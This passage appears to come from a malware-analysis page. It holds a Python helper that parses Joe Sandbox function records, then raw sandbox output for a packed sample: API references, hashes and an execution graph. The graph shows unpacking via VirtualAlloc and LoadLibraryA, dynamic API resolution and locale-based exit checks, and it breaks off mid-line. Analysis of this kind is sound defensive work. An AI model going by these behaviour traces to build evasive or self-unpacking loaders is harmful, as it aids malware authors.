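        ref_b = next((ref for n, _, ref in b.apis if n == name), None)
        if ref_b is None:                           # no common API to align on
            continue
        rva_a, rva_b = ref_a - a.dump_offset, ref_b - b.dump_offset
        pairs[oid] = (name, rva_a, rva_b, rva_b - rva_a)
    return pairs


def api_inventory(records):
    """Distinct APIs referenced across all records, for quick capability triage."""
    return sorted({f"{name}.{mod}" for r in records for name, mod, _ in r.apis})


# Constructed sample: three functions copied from this page's records and trimmed to the fields used.
SAMPLE = """
APIs
• TlsAlloc.KERNEL32(?,00410B49), ref: 00412708
• GetLastError.KERNEL32 ref: 00412715
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041272B
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412739
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
Similarity
• String ID:
• Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
• Instruction ID: ae4cec7b8514c973035fdd40d9049bb060c9e6426e6cb98910bf6ccd7d8594f9
APIs
• TlsAlloc.KERNEL32(?,046E0DB0), ref: 046E296F
• GetLastError.KERNEL32 ref: 046E297C
Memory Dump Source
• Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
Yara matches
Similarity
• Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
• Instruction ID: 3ec7eb9769e7b5ea2762ca4fda129351eb453d78a9c18263e194eaaa2b78dfad
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0D4,?,00000050,?,?,?,?,?), ref: 0043AF54
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: ACP$OCP
• Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0470B33B,?,00000050,?,?,?,?,?), ref: 0470B1BB
Memory Dump Source
• Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
Yara matches
Similarity
• Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
APIs
• GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F32
• GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F57
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: image/png
• Opcode ID: 46e06415d47cef216651a1ceb0941a1122d06094d99f4b809e1aea25a43a6a14
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for oid, (api, rva_a, rva_b, delta) in relocated_functions(recs).items():
        print(f"{oid[:16]}... {api}: image RVA {rva_a:#x} -> region RVA {rva_b:#x} (delta {delta:#x})")
    print(api_inventory(recs))
```

Running it on the whole function listing of a report rather than the sample turns the hundreds of near-duplicate records into two short outputs: the set of Opcode IDs that exist in both dumps with their common delta, and the API inventory of the unpacked region, which is the part worth reading for capability (the GDI+ encoder lookup with "image/png", for instance, only needs to be examined once).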
                                                      APIs
                                                      • SetLastError.KERNEL32(0000000D,?,046DE0BE,046DC8D6,?,?,00000000,?,046DC7A6,0045D5E4,0040C50C,0045D5DC,?,ios_base::failbit set,046DC8D6), ref: 046DF227
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: "1@
                                                      • API String ID: 1452528299-1946750398
                                                      • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction ID: b8ed01cabe733cfee4f018d0aa0cf28ad2f4a5d7e5f8f4d2f523b9a6bc52217c
                                                      • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction Fuzzy Hash: 0411E536B00126AFCF1A5FA0DC4456AFB65FF0D715B104039F917D6210EA71A911DBD0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: SpinWait
                                                      • String ID: "1@
                                                      • API String ID: 2810355486-1946750398
                                                      • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                      • Instruction ID: 831f923a2072c92010678d56a775824f1839a333889c666af47755f4fbfb12b7
                                                      • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                      • Instruction Fuzzy Hash: 6D01B5315447228FCA359F3AE5193A6BBD0EB01711B14892FE05A83764C6E9DCC2CB48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: SpinWait
                                                      • String ID: "1@
                                                      • API String ID: 2810355486-1946750398
                                                      • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                      • Instruction ID: 021eb1d0f9260cddf7cbdba049299cef82a2f2a105985599a90020559c03d5fb
                                                      • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                      • Instruction Fuzzy Hash: 400175356116268BCB259F3BD9186FABBD0EB13721F04852DD05683765E673F841FB40
                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435441
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: String
                                                      • String ID: "1@$LCMapStringEx
                                                      • API String ID: 2568140703-2505316447
                                                      • Opcode ID: 8403778a4b2da834a7d14d0bbbca5a3efa6532753a6940e146b83d5e24f58d75
                                                      • Instruction ID: 3e368ee38987b1e517a12016c66b32b70e54630f408493fbaa1ac851cb3a26ad
                                                      • Opcode Fuzzy Hash: 8403778a4b2da834a7d14d0bbbca5a3efa6532753a6940e146b83d5e24f58d75
                                                      • Instruction Fuzzy Hash: 0C012932540209BBCF066F90DD06EEE7F62EF1C755F148165FE0425161CA7A8931EB89
                                                      APIs
                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C56A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ___std_exception_destroy
                                                      • String ID: W(@$ios_base::failbit set
                                                      • API String ID: 4194217158-2439586120
                                                      • Opcode ID: 919d4c0cc113bc0c95a6bb5aa5da4368f78674bedd9ec777fa34cc4700a5dd4c
                                                      • Instruction ID: 7cd8facb47d2de9bc6e3148695225d2c28fa5bb1da43ba588d9d0b3e962b82d4
                                                      • Opcode Fuzzy Hash: 919d4c0cc113bc0c95a6bb5aa5da4368f78674bedd9ec777fa34cc4700a5dd4c
                                                      • Instruction Fuzzy Hash: 28F0BB7260022436D22026567C41B87F7CC8F51714F10443FFD44966C1E6FCA948819C
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046EDCCA
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046EDCD8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: "1@
                                                      • API String ID: 1687795959-1946750398
                                                      • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                      • Instruction ID: 263d6804b709e982de11bf399f10b19fe5c66a4af40d920b318da69cc8459d5a
                                                      • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                      • Instruction Fuzzy Hash: 1AF0E939B005165BCB04FB5ADC85C6EFBADAF85AA1310007AEA02D7351EBB4FD0586D4
                                                      APIs
                                                      • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A94A,?,00000055,00000050), ref: 00435284
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: DefaultUser
                                                      • String ID: "1@$GetUserDefaultLocaleName
                                                      • API String ID: 3358694519-473441479
                                                      • Opcode ID: d83e5488f2d0401eae8fdb885a6775d9bc5649defacb58d5f05db1f45aae4167
                                                      • Instruction ID: 5afe855fe14338923cc909c516194069f6c05087dd78cefbb7c891671ae781d2
                                                      • Opcode Fuzzy Hash: d83e5488f2d0401eae8fdb885a6775d9bc5649defacb58d5f05db1f45aae4167
                                                      • Instruction Fuzzy Hash: E1F02431A80208B7DB10AF61CC02F9E7F50EB08B50F10406ABD086A291DAB95A209ACD
                                                      APIs
                                                      • IsValidLocale.KERNEL32(00000000,00430843,00000000,00000001,?,?,00430843,?,?,00430223,?,00000004), ref: 0043534F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: LocaleValid
                                                      • String ID: "1@$IsValidLocaleName
                                                      • API String ID: 1901932003-2242624233
                                                      • Opcode ID: ae59bf1ec493319126bd60c8b327dad94e77b327732cfefd6e564b4f4afb57f8
                                                      • Instruction ID: 43810d42a241301c42746367af4d8702263165da0e6fe74aabd70bb58ff8b0b7
                                                      • Opcode Fuzzy Hash: ae59bf1ec493319126bd60c8b327dad94e77b327732cfefd6e564b4f4afb57f8
                                                      • Instruction Fuzzy Hash: 6AF05930A84608B3D7107F108C0BF9DBB54DB48B12F20403ABD007B281CEF95D11A59D
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043254D,-00000020,00000FA0,00000000,00000014,00402857), ref: 004352EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpin
                                                      • String ID: "1@$InitializeCriticalSectionEx
                                                      • API String ID: 2593887523-895698486
                                                      • Opcode ID: 7dc47b02cff7a801a8833727a72b964f8c40c2a4c50fb23b93927a844150c974
                                                      • Instruction ID: 955382fc3f26e777f362d4c5f22a523e1e843e0c58a303d945887c42e937d21c
                                                      • Opcode Fuzzy Hash: 7dc47b02cff7a801a8833727a72b964f8c40c2a4c50fb23b93927a844150c974
                                                      • Instruction Fuzzy Hash: 7CF0B431A40218FBDB116F51DC02D9F7F61EB48B11F10406AFD056A260DE7A4E20EA89
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_catch
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3886170330-2084237596
                                                      • Opcode ID: cd16dfaeb4beeb06cf1950504df26367b7e370f205a3e390df572c182ad6d8a4
                                                      • Instruction ID: 3310887d42457db3e36c9d7f794acfaa64143f504ef096225e03ad829b4e8179
                                                      • Opcode Fuzzy Hash: cd16dfaeb4beeb06cf1950504df26367b7e370f205a3e390df572c182ad6d8a4
                                                      • Instruction Fuzzy Hash: 84F0AF30610228CFDB12BF56D10159D3B70AF41B09F8680A7F5005F3A2C77C6D048FAA
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Alloc
                                                      • String ID: "1@$FlsAlloc
                                                      • API String ID: 2773662609-1790844355
                                                      • Opcode ID: ba56c54ddb02d717432006c3e9d16a2ce0462ed21875bafb0e47d434c3175fad
                                                      • Instruction ID: 8b0eae546cc32ad1acbff0ffb13529f04d7d226b7b998f6f5c852f004d1498df
                                                      • Opcode Fuzzy Hash: ba56c54ddb02d717432006c3e9d16a2ce0462ed21875bafb0e47d434c3175fad
                                                      • Instruction Fuzzy Hash: A9E05530B81218A7D314AF518C03AAEBB60DB49B11F10007BFC0167280EEBD9E1082CF
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Free
                                                      • String ID: "1@$FlsFree
                                                      • API String ID: 3978063606-3140462016
                                                      • Opcode ID: 20d26e2a8a2a7e1595337a8906793d01493818dd0c50048df32c9e5cfd81a3f1
                                                      • Instruction ID: 77f0c918036485f60e000ab15e8ffcd13dc0fd62b6771152366d896c33adff89
                                                      • Opcode Fuzzy Hash: 20d26e2a8a2a7e1595337a8906793d01493818dd0c50048df32c9e5cfd81a3f1
                                                      • Instruction Fuzzy Hash: 6CE0E532E40228A7E714BF559C07A6EBB50DB49F15F14017BFE0567281DE794E1096CE
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00429FCA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: try_get_function
                                                      • String ID: "1@$FlsAlloc
                                                      • API String ID: 2742660187-1790844355
                                                      • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                      • Instruction ID: 47b135a0a5eb8c1deda1f5282f309e78cf8f94d673be45248335df9e2a8433e5
                                                      • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                      • Instruction Fuzzy Hash: C4D0C231BC973663D500A7816D02B99BA048701FA3F0100A3FA0CA1281D6994A1046CD
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212EB
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004212F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: pThreadProxy
                                                      • API String ID: 1687795959-3651400591
                                                      • Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                      • Instruction ID: 0047e6362571caa7eccb13f0a19baa2af223b8af5f370364af5519479fe15fe9
                                                      • Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                      • Instruction Fuzzy Hash: 8CD05B31E0020856D700E7F9D846E4E77A85B10708F50417B7915E7143EB78E508CAAC
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,W(@,00000000), ref: 0042AF30
                                                      • GetLastError.KERNEL32 ref: 0042AF3E
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF99
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                      • Instruction ID: 71ba5aec0811aae5270c38f54460bdc277a4d2e01a99ee646e81732c4625e14a
                                                      • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                      • Instruction Fuzzy Hash: 56415870700222EFCB219F65E944AABBBA4EF01310F92416BFC59972A0DB7C8C51C75A
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,046D2ABE,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,046D2ABE,00000000), ref: 046FB197
                                                      • GetLastError.KERNEL32 ref: 046FB1A5
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,046D2ABE,00000000), ref: 046FB200
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                      • Instruction ID: b66b2eeaa14fb05aa70915599da255cd045b83599042e126f844dfec510721a0
                                                      • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                      • Instruction Fuzzy Hash: 2D41E631604206AFDF219FE4CC44ABE7BA5EF12B11F144169EAD9AB2A0FB31B901C750

                                                      Execution Graph

                                                      Execution Coverage:4%
                                                      Dynamic/Decrypted Code Coverage:8.3%
                                                      Signature Coverage:12.8%
                                                      Total number of Nodes:1217
                                                      Total number of Limit Nodes:29
calls 31949->31957 31951 421d51 sscanf 31958 402a20 31951->31958 31954 421db9 31954->31832 31955 421db2 ExitProcess 31956 421da6 31956->31954 31956->31955 31957->31951 31959 402a24 SystemTimeToFileTime SystemTimeToFileTime 31958->31959 31959->31954 31959->31956 32105 4242c0 CryptBinaryToStringA GetProcessHeap HeapAlloc CryptBinaryToStringA 32022 2c8cd3e 11 API calls 32149 2c8e540 133 API calls 32059 2c882bc strtok_s StrCmpCA 32108 2c93047 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 32024 4060d0 82 API calls 32109 406ad0 16 API calls 32110 2c81c57 166 API calls 32026 4024e0 50 API calls 32062 409de0 10 API calls 32063 2c8af69 114 API calls 32027 2c7be60 84 API calls 32064 2c7df6e 529 API calls 32065 2c8858e lstrcpy strtok_s strtok_s strtok_s 32111 2c96064 memmove RaiseException __CxxThrowException@8 32154 2c93567 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 31651 418df0 StrCmpCA 31652 418e16 ExitProcess 31651->31652 31653 418e1d strtok_s 31651->31653 31654 419032 31653->31654 31669 418e3c 31653->31669 31655 419013 strtok_s 31655->31654 31655->31669 31656 418e80 lstrlenA 31656->31669 31657 418fa6 StrCmpCA 31657->31655 31657->31669 31658 418eaa lstrlenA 31658->31669 31659 418f0d StrCmpCA 31659->31655 31659->31669 31660 418f2d StrCmpCA 31660->31655 31660->31669 31661 418f4d StrCmpCA 31661->31655 31661->31669 31662 418f6d StrCmpCA 31662->31655 31662->31669 31663 418f8d StrCmpCA 31663->31655 31663->31669 31664 418ed4 StrCmpCA 31664->31655 31664->31669 31665 418ef4 StrCmpCA 31665->31655 31666 418e56 lstrlenA 31666->31669 31667 418fd8 lstrlenA 31667->31669 31668 418fbf StrCmpCA 31668->31655 31668->31669 31669->31655 31669->31656 31669->31657 31669->31658 31669->31659 31669->31660 31669->31661 31669->31662 31669->31663 31669->31664 31669->31665 31669->31666 31669->31667 31669->31668 31670 41900b lstrcpy 31669->31670 31670->31655 32112 4182f0 12 API calls 31766 4268f0 31767 426d0e 8 API calls 31766->31767 31768 4268fd 43 API 
calls 31766->31768 31769 426da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31767->31769 31770 426e18 31767->31770 31768->31767 31769->31770 31771 426ee2 31770->31771 31772 426e25 8 API calls 31770->31772 31773 426eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31771->31773 31774 426f5f 31771->31774 31772->31771 31773->31774 31775 426ff9 31774->31775 31776 426f6c 6 API calls 31774->31776 31777 427120 31775->31777 31778 427006 12 API calls 31775->31778 31776->31775 31779 427129 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31777->31779 31780 42719d 31777->31780 31778->31777 31779->31780 31781 4271d1 31780->31781 31782 4271a6 GetProcAddress GetProcAddress 31780->31782 31783 427205 31781->31783 31784 4271da GetProcAddress GetProcAddress 31781->31784 31782->31781 31785 427212 10 API calls 31783->31785 31786 4272fd 31783->31786 31784->31783 31785->31786 31787 427362 31786->31787 31788 427306 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31786->31788 31789 42736b GetProcAddress 31787->31789 31790 42737e 31787->31790 31788->31787 31789->31790 31791 4273e3 31790->31791 31792 427387 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31790->31792 31792->31791 32113 406ef2 memcpy memcpy GetProcessHeap HeapAlloc memcpy 32155 425bf0 12 API calls 32114 2c8cc7d strtok_s lstrcpy lstrcpy strtok_s 32156 2c7b570 92 API calls 32157 40bbf9 21 API calls 31960 2c70005 31965 2c7092b GetPEB 31960->31965 31962 2c70030 31966 2c7003c 31962->31966 31965->31962 31967 2c70049 31966->31967 31979 2c70e0f SetErrorMode SetErrorMode 31967->31979 31972 2c70265 31973 2c702ce VirtualProtect 31972->31973 31974 2c7030b 31973->31974 31975 2c70439 VirtualFree 31974->31975 31978 2c704be LoadLibraryA 31975->31978 31977 2c708c7 31978->31977 31980 2c70223 31979->31980 31981 2c70d90 31980->31981 31982 2c70dad 31981->31982 31983 2c70238 VirtualAlloc 31982->31983 31984 2c70dbb GetPEB 31982->31984 
31983->31972 31984->31983 32160 2c93107 GetUserDefaultLocaleName LocalAlloc CharToOemW 31671 41f390 lstrlenA 31672 41f3c4 31671->31672 31673 41f3d7 lstrlenA 31672->31673 31674 41f3cb lstrcpy 31672->31674 31675 41f3e8 31673->31675 31674->31673 31676 41f3fb lstrlenA 31675->31676 31677 41f3ef lstrcpy 31675->31677 31678 41f40c 31676->31678 31677->31676 31679 41f413 lstrcpy 31678->31679 31680 41f41f 31678->31680 31679->31680 31681 41f438 lstrcpy 31680->31681 31682 41f444 31680->31682 31681->31682 31683 41f466 lstrcpy 31682->31683 31684 41f472 31682->31684 31683->31684 31685 41f49a lstrcpy 31684->31685 31686 41f4a6 31684->31686 31685->31686 31687 41f4ca lstrcpy 31686->31687 31737 41f4e0 31686->31737 31687->31737 31688 41f4ec lstrlenA 31688->31737 31689 41f699 lstrcpy 31689->31737 31690 41f581 lstrcpy 31690->31737 31691 41f6c8 lstrcpy 31752 41f6d0 31691->31752 31692 41f5a5 lstrcpy 31692->31737 31693 41f659 lstrcpy 31693->31737 31694 41f77c lstrcpy 31694->31752 31695 41f8ef StrCmpCA 31700 42006e 31695->31700 31695->31737 31696 41f7f6 StrCmpCA 31696->31695 31696->31752 31697 41fc09 StrCmpCA 31709 42000b 31697->31709 31697->31737 31698 41f91e lstrlenA 31698->31737 31699 41ff2d StrCmpCA 31703 41ff40 Sleep 31699->31703 31716 41ff55 31699->31716 31701 42008d lstrlenA 31700->31701 31702 420085 lstrcpy 31700->31702 31707 4200a7 31701->31707 31702->31701 31703->31737 31704 41fc38 lstrlenA 31704->31737 31705 41f82a lstrcpy 31705->31752 31706 401530 8 API calls 31706->31752 31714 4200c7 lstrlenA 31707->31714 31719 4200bf lstrcpy 31707->31719 31708 42002a lstrlenA 31713 420044 31708->31713 31709->31708 31711 420022 lstrcpy 31709->31711 31710 41fa7e lstrcpy 31710->31737 31711->31708 31712 41f94f lstrcpy 31712->31737 31721 41ffae lstrlenA 31713->31721 31723 42005c lstrcpy 31713->31723 31722 4200e1 31714->31722 31715 41ff74 lstrlenA 31727 41ff8e 31715->31727 31716->31715 31717 41ff6c lstrcpy 31716->31717 31717->31715 31718 41fd98 lstrcpy 31718->31737 31719->31714 31720 41fc69 lstrcpy 
31720->31737 31734 41ffc8 31721->31734 31728 420101 31722->31728 31735 4200f9 lstrcpy 31722->31735 31723->31721 31724 41f971 lstrcpy 31724->31737 31726 41faad lstrcpy 31726->31752 31727->31721 31731 41ffa6 lstrcpy 31727->31731 31736 401610 4 API calls 31728->31736 31729 41fc8b lstrcpy 31729->31737 31730 41f878 lstrcpy 31730->31752 31731->31721 31732 401530 8 API calls 31732->31737 31733 41fdc7 lstrcpy 31733->31752 31739 41ffe8 31734->31739 31741 41ffe0 lstrcpy 31734->31741 31735->31728 31755 41fff3 31736->31755 31737->31688 31737->31689 31737->31690 31737->31691 31737->31692 31737->31693 31737->31695 31737->31697 31737->31698 31737->31699 31737->31704 31737->31710 31737->31712 31737->31718 31737->31720 31737->31724 31737->31726 31737->31729 31737->31732 31737->31733 31738 41f070 28 API calls 31737->31738 31743 41f9c2 lstrcpy 31737->31743 31746 41fcdc lstrcpy 31737->31746 31737->31752 31738->31737 31756 401610 31739->31756 31740 41f190 36 API calls 31740->31752 31741->31739 31743->31737 31744 41fb04 lstrcpy 31744->31752 31745 41fb7e StrCmpCA 31745->31697 31745->31752 31746->31737 31747 41fe1e lstrcpy 31747->31752 31748 41fe98 StrCmpCA 31748->31699 31748->31752 31749 41fbab lstrcpy 31749->31752 31750 41fec9 lstrcpy 31750->31752 31751 41f070 28 API calls 31751->31752 31752->31694 31752->31696 31752->31697 31752->31699 31752->31705 31752->31706 31752->31730 31752->31737 31752->31740 31752->31744 31752->31745 31752->31747 31752->31748 31752->31749 31752->31750 31752->31751 31753 41fbf9 lstrcpy 31752->31753 31754 41ff1a lstrcpy 31752->31754 31753->31752 31754->31752 31757 40161f 31756->31757 31758 40162b lstrcpy 31757->31758 31759 401633 31757->31759 31758->31759 31760 40164d lstrcpy 31759->31760 31761 401655 31759->31761 31760->31761 31762 40166f lstrcpy 31761->31762 31764 401677 31761->31764 31762->31764 31763 401699 31763->31755 31764->31763 31765 401691 lstrcpy 31764->31765 31765->31763 32072 418190 7 API calls 32115 2c887be strtok_s 32032 2c889bc 46 API calls 32163 
